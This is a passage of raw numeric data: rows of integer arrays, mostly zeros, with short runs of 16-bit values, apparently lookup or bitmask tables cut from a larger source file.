[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 65156, 30017, 42726, 37894, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 10240, 35328, 45696, 30880, 45864, 61066, 24877],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 25988, 35905, 5094, 4358, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 57088, 4032, 62960, 42236, 16863, 34932],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 52356, 41793, 32998, 36358, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 6144, 34304, 12672, 6240, 30488, 49415],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 13188, 47681, 60902, 2822, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 1280, 18752, 6224, 45204, 62725, 53206],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 39556, 53569, 23270, 34822, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 46592, 40320, 23392, 8664, 32438, 63633],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 388, 59457, 51174, 1286, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 31488, 5824, 49072, 50540, 63611, 5288],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 26756, 65345, 13542, 33286, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 55552, 44608, 48528, 53476, 13899],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 53124, 5697, 41446, 65286, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 49408, 55360, 1040, 59780, 56769, 51050],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 13956, 11585, 3814, 31750, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 8704, 6272, 8736, 59784, 48418, 54453],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 40324, 17473, 31718, 63750, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 22272, 60864, 15728, 29404, 2647, 62620],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 1156, 23361, 59622, 30214, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 61184, 13248, 63216, 64079],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 27524, 29249, 21990, 62214, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 48384, 46912, 976, 34676, 6077, 25790],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 53892, 35137, 49894, 28678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 52736, 9088, 36064, 14904, 30158, 14745],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 14724, 41025, 12262, 60678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 29440, 38080, 12080, 40268, 13171, 48208],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 41092, 46913, 40166, 27142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 44800, 46016, 10992, 21820, 12563],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 1924, 52801, 2534, 59142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 63744, 58944, 55184, 64100, 32505, 39890],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 28292, 58689, 30438, 25606, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 47616, 48768, 23456, 17384, 46266, 11069],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 54660, 64577, 58342, 57606, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 52992, 3008, 21744, 13500, 28623, 49092],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 15492, 4929, 20710, 24070, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 51200, 12800, 48256, 21280, 38856, 48791],
